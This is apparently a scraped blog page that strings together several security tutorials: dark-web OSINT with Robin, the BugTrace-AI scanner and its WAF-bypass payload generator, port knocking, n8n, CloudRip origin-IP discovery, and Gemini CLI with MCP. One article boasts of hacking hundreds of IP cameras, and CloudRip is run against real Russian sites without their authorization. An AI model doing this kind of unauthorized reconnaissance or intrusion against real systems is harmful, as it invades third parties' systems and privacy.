The numbers tell a stark story: $1.42 billion lost across 149 documented incidents in 2024 due to smart contract vulnerabilities, with access control flaws accounting for $953.2 million in damages alone. While the Web3 community debates the perfect AI solution for smart contract security, billions continue to drain from protocols that could have been protected..
Security researchers and penetration testers gain a comprehensive open-source reconnaissance platform with the release of Argus v2.0, a Python-based information gathering toolkit that consolidates 135 specialised modules into a unified command-line interface. The toolkit addresses the growing complexity of modern attack surface management by providing integrated access to network mapping, web application analysis, and threat [β¦]
If youβve ever conducted an OSINT investigation, you probably know that the dark web is one of the hardest places to investigate. Whether youβre tracking ransomware groups or looking for leaked passwords manually searching through dark web results takes hours and gives you mostly junk and malware. This is where AI can change how you investigate. By using Large Language Models we can improve our searches and filter results faster. To do this, we have a tool called Robin.
In this article, weβll explore how to install this tool, how to use it, and what features it provides. Letβs get rolling!
What is Robin
Robin is an open-source tool for investigating the dark web. It uses AI to improve your searches, filter results from dark web search engines, and summarize what you find. What makes Robin particularly valuable is its multi-model support. You can easily switch between OpenAI, Claude, Gemini, or local models like Ollama depending on your needs, budget, and privacy requirements. The tool is CLI-first, built for terminal users who want to integrate dark web intelligence into their existing workflows.
Step #1: Install Robin
For this demonstration, Iβll be using a Raspberry Pi as the hacking platform, but you can easily replicate all the steps using Kali or any other Debian-based distribution. To install the tool, we can either use the source code from GitHub or Docker. I will choose the first option. To begin, clone the repository first:
As shown in the downloaded files, this is a Python project. We need to create a virtual environment and install the required packages.
pi> python -m venv venv
pi> source venv/bin/activate
pi> pip3 install -r requirements.txt
Before Robin can search the dark web, we need to have Tor running on your system. Install Tor by opening your terminal and executing the following command:
pi> sudo apt install tor
Step #2: Configure Your API Key
In this demonstration, I will be using Googleβs Gemini models. You can easily create an API key in Google AI Studio to access the models. If you open the config.py file, you will see which models support the tool.
Robin can be configured using either a .env file or system environment variables. For most users, creating a .env file in your Robin directory provides the cleanest approach. This method keeps your API credentials organized and makes it easy to switch between different configurations. Open the file in your preferred text editor and add your Gemini API key.
Step #3: Execute Your First Dark Web Investigation
First, letβs open the help screen to see which options this tool supports and to verify that we installed it correctly.
pi> python3 main.py βhelp
Currently, we can see two supported modes for using this tool: CLI and web UI. I prefer CLI, so I will demonstrate that. Letβs explore the help screen of the CLI mode.
pi> python3 main.py cli βhelp
Itβs a straightforward help screen; we simply need to specify an LLM model and our query. Letβs search for credential exposure.
After a few minutes of processing, Robin produced the gathered information on the terminal. By default, it is formatted in Markdown and saved to a file with a name based on the current date and time. To view the results with Markdown formatting, Iβll use a command-line tool called glow.
pi> glow summary-xx-xx.md
The analysis examined various Tor-based marketplaces, vendors, and leak sources that advertise stolen databases and credentials. The findings reveal a widespread exposure of personally identifiable information (PII), protected health information (PHI), financial data, account credentials, and cryptocurrency private keys associated with major global organizations and millions of individuals. The report documents active threat actors, their tactics, and methods of monetization. Key risks have been identified, along with recommended next steps.
Understand the Limitations
While Robin is a powerful tool for dark web OSINT, itβs important to understand its limits. The tool uses dark web search engines, which only index a small part of whatβs actually on hidden services. Many dark websites block indexing or require you to log in, so Robin canβt reach them through automated searches. For thorough investigations, youβll still need to add manual research and other OSINT methods to what Robin finds.
The quality of Robinβs intelligence summaries depends a lot on the LLM youβre using and the quality of what it finds. Gemini 2.5 Flash gives great results for most investigations, but the AI can only work with the information in the search results. If your search doesnβt match indexed content, or if the information you need is behind a login wall, Robin wonβt find it.
Summary
Conducting investigations on the dark web can be time-consuming when using traditional search tools. Since the dark web relies on anonymity networks, isnβt indexed by standard search engines, and contains a vast amount of irrelevant information, manual searching can often be slow and ineffective. Robin addresses these challenges by leveraging AI to enhance your searches, intelligently filter results, and transform findings into useful intelligence reports. While this tool does have limitations, it can be a valuable addition to your arsenal when combined with manual searching and other OSINT tools.
If youβre interested in deepening your knowledge of OSINT investigations or even starting your own investigation business, consider exploring our OSINT training to enhance your skills.
Are you trying to figure out what tools are best for testing your web applications? If so, you have likely done some research and know there are a lot of options from complex Java log parser tools to other tools that are much more simple in design, and as such free logging tools. If you [β¦]
This article was first published at Hackers-Arise in April 2022, just 2 months after the Russians invaded in Ukraine.
At the request of the IT Army of Ukraine, we were asked to help the war efforts by hacking a large number of IP cameras within Ukrainian territory. In this way, we can watch and surveil the Russian army in those areas. Should they commit further atrocities (we certainly pray they will not), we should be able to capture that on video and use it in the International Criminal Court. At the very least, we hope the word goes out to the Russian soldiers that we are watching and that constrains their brutality.
In a collaborative effort, our team (you all) has been able to hack into a very large number. We have nearly 500, and we are working on the remainder.
Here is a sampling of some of the cameras we now own for surveillance in Russia and Ukraine.
Β Β Β Β Β Β Β Β Β Β Β Β Β Β
To learn more about hacking IP cameras, become aSubscriber Pro and attend our IP Camera Hacking training.
Welcome back, aspiring cyberwarriors and AI enthusiasts!
AI is stepping up in every aspect of our cybersecurity job: STRIDE-GPT generates threat models and mitigations to them, BruteForceAI helps with password attacks, and LLM-Tools-Nmap conducts reconnaissance. Today is a time to explore AI-powered vulnerability scanning.
In this article, weβll cover the BugTrace-AI toolkit from installation through advanced usage. Weβll begin with setup and configuration, then explore each of the core analysis tools, including URL analysis, code review, and security header evaluation. Letβs get rolling!
What Is BugTrace-AI?
BugTrace-AI leverages Generative AI to understand context, identify logic flaws, and provide intelligent recommendations that adapt to each unique situation. The tool performs non-invasive reconnaissance and analysis, generating hypotheses about potential vulnerabilities that serve as starting points for manual investigation.
The platform integrates both Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST) within a single interface. It supports multiple AI models through OpenRouter, including Google Gemini, Anthropic Claude, and many more.
Itβs important to recognize that this tool functions as an assistant rather than an automated exploitation tool. Based on that, we should understand that all findings should be deliberately validated.
Step #1: Installation
First of all, we need to clone the repository from GitHub:
After listing the content of the downloaded directory, we can see the script we need β dockerizer.sh. We need to add execution permissions and launch it.
kali> chmod +x dockerizer.sh
kali> sudo ./dockerizer.sh
At this point, you may encounter an issue with the script, as it is currently incompatible with Docker Compose version 2 at the time of writing. To fix the script, you can manually change it or use the following:
#!/bin/bash set -e
COMPOSE_FILE="docker-compose.yml"
echo "--- Stopping any previous containers... ---" docker compose -f "$COMPOSE_FILE" down -v || \ echo "Warning: 'docker compose down' failed. This might be the first run, which is okay."
echo "--- Building and starting the application... ---" docker compose -f "$COMPOSE_FILE" up --build -d
echo "--- Application is now running! ---" echo "Access it at: http://localhost:6869" echo "To stop the application, run: docker compose -f $COMPOSE_FILE down"
# === Try to launch Firefox with checks === sleep 3 # Give the container a moment to start
if [ -z "$DISPLAY" ]; then echo "β οΈ No GUI detected (DISPLAY is not set)." echo "π‘ Open http://localhost:6869 manually in your browser." elif ! command -v firefox &> /dev/null; then echo "β οΈ Firefox is not installed." echo "π‘ Install it with: sudo apt install firefox" else echo "π Launching Firefox..." firefox http://localhost:6869 & fi
After updating the script, you should see the process of building the Docker image and starting the container in detached mode.
After finishing, you can now access BugTrace-AI atΒ http://localhost:6869. You will see the disclaimer similar to the one below.
If you accept it, the app will load the main screen.
Step #2: Configuring API Access
BugTrace-AI requires an OpenRouter API key to function. OpenRouter provides unified access to multiple AI models through a single API, making it ideal for this application. Visit the OpenRouter website at https://openrouter.ai and create an account if you donβt already have one. Navigate to the API keys section and generate a new key.
In the BugTrace-AI interface, click the Settings icon in the header. This opens a modal where you can enter your API key.
Step #3: Understanding the Three Scan Modes
BugTrace-AI offers three URL analysis modes, each designed for different scenarios and authorization levels.
The Recon Scan focuses entirely on passive reconnaissance. It analyzes the URL structure looking for patterns that might indicate vulnerabilities, performs technology fingerprinting using public databases, searches CVE databases for vulnerabilities in identified technologies, and checks public exploit databases like Exploit-DB for available exploits. This mode never sends any traffic to the target beyond the initial page load.
The Active Scan analyzes URL patterns and parameters to hypothesize vulnerabilities. Despite its name, this mode remains βsimulated activeβ because it doesnβt actually send attack payloads. Instead, it uses AI reasoning to identify URL patterns that commonly correlate with vulnerabilities. For example, URLs with parameters named βidβ or βuserβ might be susceptible to SQL injection, while parameters that appear in the page output could be vulnerable to XSS. The AI generates hypotheses about potential vulnerabilities based on these patterns and guides how to test them manually.
The Grey Box Scan combines DAST with SAST by analyzing the pageβs live JavaScript code. After loading the target URL, the tool extracts all JavaScript code from the page, including inline scripts and external files. The AI then performs static analysis on this JavaScript, looking for client-side vulnerabilities, hardcoded secrets or API keys, insecure data handling patterns, and client-side logic flaws.
For this exercise, weβll analyze a web application with the third mode.
The tool generates a report summarizing its findings.
BugTrace-AI highlights possible vulnerabilities and suggests what to test manually based on what it finds. You can also review all results with the Agent, which remembers context so you can ask follow-up questions about earlier findings or how to verify them.
Step #4: Payload Generation Tools
Web Application Firewalls (WAFs) attempt to block malicious requests by detecting attack patterns. The Payload Forge helps bypass WAF protections by generating payload variations using obfuscation and encoding techniques.
The tool generates a few dozen payloads. Each of them includes an explanation of the obfuscation technique used and the specific WAF detection methods itβs designed to evade.
Besides that, BugTrace-AI suggests SSTI payloads and OOB Interaction Helper.
Summary
BugTrace-AI is a next-generation vulnerability scanning tool. Unlike traditional scanners that rely on rule-based detection, BugTrace-AI focuses on understanding the logic and context of its target.
In this article, we installed the tool and tested some of its features. But, this is not a comprehensive guide; BugTrace-AI offers many more capabilities designed to make cybersecurity work easier. We encourage you to install the tool and explore its full potential on your own. Keep in mind that it is not an all-in-one solution, and every finding should be manually verified.
If you want to dive deeper into using AI for hacking, consider checking out AI for Cybersecurity training. This 7-hour video course, led by a Master OTW, is designed to take your understanding and practical use of artificial intelligence to the next level.
As you know, there are plenty of automation tools out there, but most of them are closed-source, cloud-only services that charge you per operation and keep your data on their servers. For those of us who value privacy and transparency, these solutions simply wonβt do. Thatβs where n8n comes into the picture β a free, private workflow automation platform that you can self-host on your own infrastructure while maintaining complete control over your data.
In this article, we explore n8n, set it up on a Raspberry Pi, and create a workflow for monitoring security news and sending it to Matrix. Letβs get rolling!
What is n8n?
n8n is a workflow automation platform that combines AI capabilities with business process automation, giving technical teams the flexibility of code with the speed of no-code. The platform uses a visual node-based interface where each node represents a specific action, for example, reading an RSS feed, sending a message, querying a database, or calling an API. When you connect these nodes, you create a workflow that executes automatically based on triggers you define.
With over 400 integrations, native AI capabilities, and a fair-code license, n8n lets you build powerful automation while maintaining full control over your data and deployments.
The Scenario: RSS Feed Monitoring with Matrix Notifications
For this tutorial, weβre going to build a practical workflow that many security professionals and tech enthusiasts need: automatically monitoring RSS feeds from security news sites and threat intelligence sources, then sending new articles directly to a Matrix chat room. Matrix is an open-source, decentralized communication protocolβessentially a privacy-focused alternative to Slack or Discord that you can self-host.
Step #1: Installing n8n on Raspberry Pi
Letβs get started by setting up n8n on your Raspberry Pi. First, we need to install Docker, which is the easiest way to run n8n on a Raspberry Pi. SSH into your Pi and run these commands:
pi> curl -fsSL https://get.docker.com -o get-docker.sh pi> sudo sh get-docker.sh pi> sudo usermod -aG docker pi
Log out and back in for the group changes to take effect. Now we can run n8n with Docker in a dedicated directory:
This command runs n8n as a background service that automatically restarts if it crashes or when your Pi reboots. It maps port 5678 so you can access the n8n interface, and it creates a persistent volume at /opt/n8n/data to store your workflows and credentials so they survive container restarts. Also, the service doesnβt require an HTTPS connection; HTTP is enough.
Give it a minute to download and start, then open your web browser and navigate to http://your-raspberry-pi-ip:5678. You should see the n8n welcome screen asking you to create your first account.
Step #2: Understanding the n8n Interface
Once youβre logged in and have created your first workflow, youβll see the n8n canvasβa blank workspace where youβll build your workflows. The interface is intuitive, but let me walk you through the key elements.
On the right side, youβll see a list of available nodes organized by category (Tab key). These are the building blocks of your workflows. There are trigger nodes that start your workflow (like RSS Feed Trigger, Webhook, or Schedule), action nodes that perform specific tasks (like HTTP Request or Function), and logic nodes that control flow (like IF conditions and Switch statements).
The main canvas in the center is where youβll drag and drop nodes and connect them. Each connection represents data flowing from one node to the next. When a workflow executes, data passes through each node in sequence, getting transformed and processed along the way.
Step #3: Creating Your First Workflow β RSS to Matrix
Now letβs build our RSS monitoring workflow. Click the βAdd workflowβ button to create a new workflow. Give it a meaningful name like βSecurity RSS to Matrixβ.
Weβll start by adding our trigger node. Click the plus icon on the canvas and search for βRSS Feed Triggerβ. Select it and youβll see the node configuration panel open on the right side.
In the RSS Feed Trigger node configuration, you need to specify the RSS feed URL you want to monitor. For this example, letβs use the Hackers-Arise feed.
The RSS Feed Trigger has several important settings. The Poll Times setting determines how often n8n checks the feed for new items. You can set it to check every hour, every day, or on a custom schedule. For a security news feed, checking every hour makes sense, so you get timely notifications without overwhelming your Matrix room.
Click βExecute Nodeβ to test it. You should see the latest articles from the feed appear in the output panel. Each article contains data like title, link, publication date, and sometimes the author. This data will flow to the next nodes in your workflow.
Step #4: Configuring Matrix Integration
Now we need to add the Matrix node to send these articles to your Matrix room. Click the plus icon to add a new node and search for βMatrixβ. Select the Matrix node and βCreate a messageβ as the action.
Before we can use the Matrix node, we need to set up credentials. Click on βCredential to connect withβ and select βCreate Newβ. Youβll need to provide your Matrix homeserver URL, your Matrix username, and password or access token.
Now comes the interesting partβcomposing the message. n8n uses expressions to pull data from previous nodes. In the message field, you can reference data from the RSS Feed Trigger using expressions like {{ $json.title }} and {{ $json.link }}.
Hereβs a good message template that formats the RSS articles nicely:
Click the βExecute Workflowβ button at the top. You should see the workflow execute, data flow through the nodes, and if everything is configured correctly, a message will appear in your Matrix room with the latest RSS article.
Once youβve confirmed the workflow works correctly, activate it by clicking the toggle switch at the top of the workflow editor.
The workflow is now running automatically! The RSS Feed Trigger will check for new articles according to the schedule you configured, and each new article will be sent to your Matrix room.
Summary
The workflow we built today, monitoring RSS feeds and sending security news to Matrix, demonstrates n8nβs practical value. Whether youβre aggregating threat intelligence, monitoring your infrastructure, managing your home lab, or just staying on top of technology news, n8n can eliminate the tedious manual work that consumes so much of our time.
As you are aware, traditional security approaches typically involve firewalls that either allow or deny traffic to specific ports. The problem is that allowed ports are visible to anyone running a port scan, making them targets for exploitation. Port knocking takes a different approach: all ports appear filtered (no response) to the outside world until you send a specific sequence of connection attempts to predetermined ports in the correct order. Only then does your firewall open the desired port for your IP address.
Letβs explore how this technique works!
What is Port Knocking?
Port knocking is a method of externally opening ports on a firewall by generating a connection attempt sequence to closed ports. When the correct sequence of port βknocksβ is received, the firewall dynamically opens the requested port for the source IP address that sent the correct knock sequence.
The beauty of this technique is its simplicity. A daemon (typically called knockd) runs on your server and monitors firewall logs or packet captures for specific connection patterns. When it detects the correct sequence, it executes a command to modify your firewall rules, usually opening a specific port for a limited time or for your specific IP address only.
The knock sequence can be as simple as attempting connections to three ports in order, like 7000, 8000, 9000, or as complex as a lengthy sequence with timing requirements. The more complex your sequence, the harder it is for an attacker to guess or discover through brute force.
The Scenario: Securing SSH Access to Your Raspberry Pi
For this tutorial, Iβll demonstrate port knocking between a Kali Linux machine and a Raspberry Pi. This is a close to real-world scenario that many of you might use in your home lab or for remote management of IoT devices. The Raspberry Pi will run the knockd daemon and have SSH access hidden behind port knocking, while our Kali machine will perform the knocking sequence to gain access.
Step #1: Setting Up the Raspberry Pi (The Server)
Letβs start by configuring our Raspberry Pi to respond to port knocking. First, we need to install the knockd daemon:
pi> sudo apt install knockd
The configuration file for knockd is located at /etc/knockd.conf. Letβs open it.
Hereβs a default configuration that is recommended for beginners. The only thing I changed -A flag to -I to insert the rule at position 1 (top) so it will be evaluated before any DROP rules.
The [openSSH] section defines our knock sequence: connections must be attempted to ports 7000, 8000, and 9000 in that exact order. The seq_timeout of 5 seconds means all three knocks must occur within 5 seconds of each other. When the correct sequence is detected, knockd executes the iptables command to allow SSH connections from your IP address.
The [closeSSH] section does the reverse: it uses the knock sequence in reverse order (9000, 8000, 7000) to close the SSH port again.
Now we need to enable knockd to start on boot:
pi> sudo vim /etc/default/knockd
Change the line START_KNOCKD=0 to START_KNOCKD=1 and make sure the network interface is set correctly.
Step #2: Configuring the Firewall
Before we start knockd, we need to configure our firewall to block SSH by default. This is critical because port knocking only works if the port is actually closed initially.
pi> sudo iptables -A INPUT -p tcp βdport 22 -j DROP
pi> sudo iptables -A INPUT -j DROP
These rules allow established connections to continue (so your current SSH session wonβt be dropped), block new SSH connections, and drop all other incoming traffic by default.
Your Raspberry Pi is now configured and waiting for the secret knock! From the outside world, SSH appears with filtered access.
Step #3: Installing Knock Client on Kali Linux
Now letβs switch to our Kali Linux machine. We need to install the knock client, which is the tool weβll use to send our port knocking sequence.
kali> sudo apt-get install knockd
The knock client is actually part of the same package as the knockd daemon, but weβll only use the client portion on our Kali machine.
Step #4: Performing the Port Knock
Before we try to SSH to our Raspberry Pi, we need to perform our secret knock sequence. From your Kali Linux terminal, run:
kali> knock -v 192.168.0.113 7000 8000 9000
The knock client is sending TCP SYN packets to each port in sequence. These packets are being logged by the knockd daemon on your Raspberry Pi, which recognizes the pattern and opens SSH for your IP address.
Now, immediately after knocking, try to SSH to your Raspberry Pi:
If everything is configured correctly, you should connect successfully! The knockd daemon recognized your knock sequence and added a temporary iptables rule allowing your IP address to access SSH.
When youβre done with your SSH session, you can close the port again by sending the reverse knock sequence:
kali> knock -v 192.168.1.100 9000 8000 7000
Step #5: Verifying Port Knocking is Working
Letβs verify that our port knocking is actually providing security. Without performing the knock sequence first, try to SSH directly to your Raspberry Pi:
The connection should hang and eventually timeout. If you run nmap against your Raspberry Pi without knocking first, youβll see that port 22 appears filtered:
Now perform your knock sequence and immediately scan again:
This demonstrates how port knocking makes services filtered until the correct sequence is provided.
Summary
Port knocking is a powerful technique for adding an extra layer of security to remote access services. By requiring a specific sequence of connection attempts before opening a port, it makes your services harder to detect to attackers and reduces your attack surface. But remember that port knocking should be part of a defense-in-depth strategy, not a standalone security solution.
Cloudflare has built an $80 billion business protecting websites. This protection includes DDoS attacks and protecting IP addresses from disclosure. Now, we have a tool that can disclose those sites IP addresses despite Cloudflareβs protection.
As you know, many organizations deploy Cloudflare to protect their main web presence, but they often forget about subdomains. Development servers, staging environments, admin panels, and other subdomains frequently sit outside of Cloudflareβs protection, exposing the real origin IP addresses. CloudRip is a tool that is specifically designed to find these overlooked entry points by scanning subdomains and filtering out Cloudflare IPs to show you only the real server addresses.
In this article, weβll install CloudRip, test it, and then summarize its benefits and potential drawbacks. Letβs get rolling!
Now we need to install the dependencies. CloudRip requires only two Python libraries: colorama for colored terminal output and pyfiglet for the banner display.
Youβre ready to start finding real IP addresses behind Cloudflare protection. The tool comes with a default wordlist (dom.txt) so you can begin scanning immediately.
Step #2: Basic Usage of CloudRip
Letβs start with the simplest command to see CloudRip in action. For this example, Iβll use some Russian websites with CloudFlare provided by BuildWith.
Before scanning, letβs confirm the website is registered in Russia with the whois command:
kali> whois esetnod32.ru
NS servers are from CloudFlare, and the registrar is Russian. Use dig to check if CloudFlare proxying hides the real IP in the A record.
kali> dig esetnod32.ru
IPs belong to CloudFlare. Weβre ready to test out the CloudRip on it.
kali> python3 cloudrip.py esetnod32.ru
The tool tests common subdomains (www, mail, dev, etc.) from its wordlist, resolves their IPs, and checks if they belong to Cloudflare.
In this case, we can see that the main website is hiding its IP via CloudFlare, but the subdomainsβ IPs donβt belong to CloudFlare.
Step #3: Advanced Usage with Custom Options
CloudRip provides several command-line options that give you greater control over your reconnaissance.
Hereβs the full syntax with all available options:
-w (wordlist): This allows you to specify your own subdomain wordlist. While the default dom.txt is quite good, experienced hackers often maintain their own customized wordlists tailored to specific industries or target types.
-t (threads): This controls how many threads CloudRip uses for scanning. The default is 10, which works well for most situations. However, if youβre working with a large wordlist and need faster results, you can increase this to 20 or even higher. Just be mindful that too many threads might trigger rate limiting or appear suspicious.
-o (output file): This saves all discovered non-Cloudflare IP addresses to a text file.
Step #4: Practical Examples
Let me walk you through a scenario to show you how CloudRip fits into a real engagement.
Scenario 1: Custom Wordlist for Specific Target
After running subfinder, some unique subdomains were discovered:
kali> subfinder -d rp-wow.ru -o rp-wow.ru.txt
Letβs filter them for subdomains only.
kali> grep -v β^rp-wow.ru$β rp-wow.ru.txt | sed βs/.rp-wow.ru$//β > subdomains_only.txt
CloudRip excels at its specific task. Rather than trying to be a Swiss Army knife, it focuses on one aspect of reconnaissance and does it well.
The multi-threaded architecture provides a good balance between speed and resource consumption. You can adjust the thread count based on your needs, but the defaults work well for most situations without requiring constant tweaking.
Potential Drawbacks
Like any tool, CloudRip has limitations that you should understand before relying on it heavily.
First, the toolβs effectiveness depends entirely on your wordlist. If the target organization uses unusual naming conventions for its subdomains, even the best wordlist might miss them.
Second, security-conscious organizations that properly configure Cloudflare for ALL their subdomains will leave little for CloudRip to discover.
Finally, CloudRip only checks DNS resolution. It doesnβt employ more sophisticated techniques like analyzing historical DNS records or examining SSL certificates for additional domains. It should be one tool in your reconnaissance toolkit, not your only tool.
Summary
CloudRip is a simple and effective tool that helps you find real origin servers hidden behind Cloudflare protection. It works by scanning many possible subdomains and checking which ones use Cloudflareβs IP addresses. Any IPs that do not belong to Cloudflare are shown as possible real server locations.
The tool is easy to use, requires very little setup, and automatically filters results to save you time. Both beginners and experienced cyberwarriors can benefit from it.
Test it outβit may become another tool in your hackerβs toolbox.
Welcome back, aspiring cyberwarriors and AI users!
If youβre communicating with AI assistants via browsers, youβre doing it in a slow way. Any content, for example, such as code, must first be added to the chatbot and then copied back to the working environment. If you are working on several projects, you have a whole bunch of chats created, and gradually, the AI loses context in them. To solve all these problems, we have AI in the terminal.
In this article, weβll explore how to leverage the Gemini CLI for cybersecurity tasksβspecifically, how it can accelerate Python scripting. Letβs get rolling!
Step #1: Get Ready
Our test harness centers on the MCP server we built for logβanalysis, covered in detail in a previous article. While it shines with logs, the setup is completely generic and can be repurposed for any dataβprocessing workload.
At this point, experienced users might ask why we need to use the MCP server if Gemini can already do the same thing by default. The answer is simple: we have more control over it. We donβt want to give the AI access to the whole system, so we limit it to a specific environment. Moreover, this setup gives us the opportunity for customizationβwe can add new functions, restrict existing ones according to our needs, or integrate additional tools.
Here is a demonstration of the restriction:
Step #2: Get Started With The Code
If you donβt write code frequently, youβll forget how your scripts work. When the moment finally arrives, you can ask an AI to explain them to you.
We simply specified the script and got an explanation, without any copying, pasting, or uploading to a browser. Everything was done in the terminal in seconds. Now, letβs say we want to improve the codeβs style according to PEPβ―8βthe official Style Guide for Python.
The AI asks for approval for every edit and visually represents the changes. If you agree, summarize the updates at the end.
Interestingly, the AI changed spaces in the code and broke the script because the network range was specified incorrectly.
So, in this case, the AI didnβt understand the context, but after fixing it, everything worked as intended.
Letβs see how we can use Gemini CLI to improve our workflow. First, letβs ask for any recommendations for improvements to the script.
And, immediately after suggesting the changes, the AI begins implementing the improvements. Letβs follow that.
A few lines of code were added, and it looks pretty clean. Now, letβs shift our focus to improving error handling rather than the scanning functionality.
Letβs run the script.
Errors are caught reliably, and the script executes flawlessly. Once it finishes, it outputs the list of discovered live hosts.
Step #3: Gemini CLI Tools
By typing /tools, we can see what the Gemini CLI allows us to do by default.
But one of the most powerful tools is /init. It analyzes the project and creates a tailored Markdown file.
Basically, the Gemini CLI creates a file with instructions for itself, allowing it to understand the context of what weβre working on.
Each time we run the Gemini CLI, it loads this file and understands the context.
We can close the app, reopen it later, and it will pick up exactly where we left offβwithout any extra explanation. Everything remains neatly organized.
Summary
By bringing the assistant straight into your command line, you keep the workflow tight, the context local to the files youβre editing, and the interaction essentially instantaneous.
In this article, we examined how the Geminiβ―CLI can boost the effectiveness of writing Python code for cybersecurity, and we highlighted the advantages of using the MCP server along with the built-in tools that Gemini provides by default.
Keep returning, aspiring hackers, as we continue to explore MCP and the application of artificial intelligence in cybersecurity.
In our previous article, we examined the architecture of MCP and explained how to get started with it. Hundreds of MCP servers have been built for different services and tasksβsome are dedicated to cybersecurity activities such as reverse engineering or reconnaissance. Those servers are impressive, and weβll explore several of them in depth here at HackersβArise.
However, before we start βplayingβ with other peopleβs MCP servers, I believe we should first develop our own. Building a server ourselves lets us see exactly whatβs happening under the hood.
For that reason, in this article, weβll develop an MCP server for analyzing security logs. Letβs get rolling!
Step #1: Fire Up Your Kali
In this tutorial, I will be using the Gemini CLI with MCP on Kali Linux. You can install Gemini using the following command:
kali> sudo npm install -g @google/gemini-cli
Now, we should have a working AI assistant, but it doesnβt yet have access to any of our security tools.
Step #2: Create a Security Operations Directory Structure
Before we start configuring MCP servers, letβs set up a proper directory structure for our security operations. This keeps everything organized and makes it easier to manage permissions and access controls.
Create a dedicated directory for security analysis work in your home directory.
This creates a security-ops directory with subdirectories for logs, analysis reports, malware samples, and other security artifacts.
Letβs also create a directory to store any custom MCP server configurations we build.
kali> mkdir -p ~/security-ops/mcp-servers
For testing purposes, letβs create some sample log files we can analyze. In a real environment, youβd be analyzing actual security logs from your infrastructure.
Firstly, letβs create a sample web application firewall log.
kali> vim ~/security-ops/logs/waf-access.log
This sample log contains various types of suspicious activity, including SQL injection attempts, directory traversal, authentication failures, and XSS attempts. Weβll use this to demonstrate MCPβs log analysis capabilities.
Letβs also create a sample authentication log.
kali> vim ~/security-ops/logs/auth.log
Now we have some realistic security data to work with. Letβs configure MCP to give Gemini controlled access to these files.
Step #3: Configure MCP Server for Filesystem Access
The MCP configuration file lives at ~/.gemini/settings.json. This JSON file tells Gemini CLI which MCP servers are available and how to connect to them. Letβs create our first MCP server configuration for secure filesystem access.
Check if the .gemini directory exists, and create it if it doesnβt.
kali> mkdir ~/.gemini
Now edit the settings.json file. Weβll start with a basic filesystem MCP server configuration.
This sets up a filesystem MCP server with restricted access to only our security-ops directory. First, it uses npx to run the MCP server, which means it will automatically download and execute the official filesystem server from the Model Context Protocol project. The -y flag tells npx to proceed without prompting. The server-filesystem package is the official MCP server for file operations. Second, and most critically, weβre explicitly restricting access to only the /home/kali/security-ops directory. The filesystem server will refuse to access any files outside this directory tree, even if Gemini tries to. This is defense in depth, ensuring the AI cannot accidentally or maliciously access sensitive system files.
Now, letβs verify that the MCP configuration is valid and the server can connect. Start Gemini CLI again.
kali> gemini
After running, we can see that 1 MCP server is in use and Gemini is running in the required directory.
Now, use the /mcp command to list configured MCP servers.
/mcp list
You should see output showing the security-filesystem server with a βreadyβ status. If you see βdisconnectedβ or an error, double-check your settings.json file for typos and check if you have nodejs, npm, and npx installed.
Now letβs test the filesystem access by asking Gemini to read one of our security logs. This demonstrates that MCP is working and Gemini can access files through the configured server.
> Read the file ~/security-ops/logs/waf-access.log and tell me what security events are present
Pretty clear summary. The key thing to understand here is that Gemini itself doesnβt have direct filesystem access. Itβs asking the MCP server to read the file on its behalf, and the MCP server enforces the security policy we configured.
Step #4: Analyzing Security Logs with Gemini and MCP
Now that we have MCP configured for filesystem access, letβs do some real security analysis. Letβs start by asking Gemini to perform a comprehensive analysis of the web application firewall log we created earlier.
> Analyze ~/security-ops/logs/waf-access.log for attack patterns. For each suspicious event, identify the attack type, the source IP, and assess the severity. Then provide recommendations for defensive measures.
The analysis might take a few seconds as Gemini processes the entire log file. When it completes, youβll get a detailed breakdown of the security events along with recommendations like implementing rate limiting for the attacking IPs, ensuring your WAF rules are properly configured to block these attack patterns, and investigating whether any of these attacks succeeded.
Now letβs analyze the authentication log to identify potential brute force attacks.
> Read ~/security-ops/logs/auth.log and identify any brute force authentication attempts. Report the attacking IP, number of attempts, timing patterns, and whether the attack was successful.
Letβs do something more advanced. We can ask Gemini to correlate events across multiple log files to identify coordinated attack patterns.
> Compare the events in ~/security-ops/logs/waf-access.log and ~/security-ops/logs/auth.log. Do any IP addresses appear in both logs? If so, describe the attack campaign and create a timeline of events.
The AI generated a formatted timeline of the attack showing the progression from SSH attacks to web application attacks, demonstrating how the attacker switched tactics after the initial approach failed.
Summary
MCP, combined with Geminiβs AI capabilities, serves as a powerful force multiplier. It enables us to automate routine analysis tasks, instantly correlate data from multiple sources, leverage AI for pattern recognition and threat hunting, and retain full transparency and control over the entire process.
In this tutorial, we configured an MCP server for file system access and tested it using sample logs.
Keep returning, aspiring hackers, as we continue to explore MCP and the application of artificial intelligence in cybersecurity.
Cisco Security Cloud Control introduces multi-customer management for MSPs, streamlining operations and automating deployments for better security outcomes.
One of the key tasks for those defending a countryβs, institutionβs or corporationβs assets is to understand what threats exist. This is often referred to as Cyber Threat Intelligence or CTI. It encompasses understanding what the threat actors (hackers and nations) are doing and which are threats to your organization. In that regard, we have a new tool to identify and track command and control servers, malware and botnets using telltale fingerprinting from Shodan and Censys.
Command and Control Servers: History, Development & Tracking
In the fast-changing world of cybersecurity, Command and Control (C2) servers have been crucial. These servers are central to many cyber attacks and play a big role in the ongoing fight between offensive and defensive sides. To appreciate modern tools like C2 Tracker, letβs look back at the history and development of C2 servers.
Early days
The story of C2 servers starts in the early days of the internet, back in the 1990s. Hackers used Internet Relay Chat (IRC) channels as their first basic command centers. Infected computers would connect to these IRC channels, where attackers could send commands directly. The malware on the compromised systems would then carry out these commands.
The following figure shows the Hoaxcalls botβs C2 communication with its C2 server over IRC.
The Web Era and the Art of Blending In
As detection methods got better, attackers changed their tactics. In the early 2000s, they started using web-based C2 systems. By using HTTP and HTTPS, attackers could hide their C2 traffic as regular web browsing. Since web traffic was everywhere, this method was a clever way to camouflage their malicious activities.
Using basic web servers to manage their command systems also made things simpler for attackers. This period marked a big step up in the sophistication of C2 methods, paving the way for even more advanced techniques.
Decentralization: The Peer-to-Peer Revolution
In the mid-2000s, C2 systems saw a major change with the rise of peer-to-peer (P2P) networks. This shift addressed the weakness of centralized servers, which were easy targets for law enforcement and defensive security teams.
In P2P C2 systems, infected computers talk to each other to spread commands and steal data. This decentralized setup made it much harder to shut down the network. Examples like the Storm botnet and later versions of the Waledac botnet showed how tough this model was to tackle, pushing cybersecurity experts to find new ways to detect and counter these threats.
Machines infected by Storm botnet:
Hiding in Plain Sight: The Social Media and Cloud Era
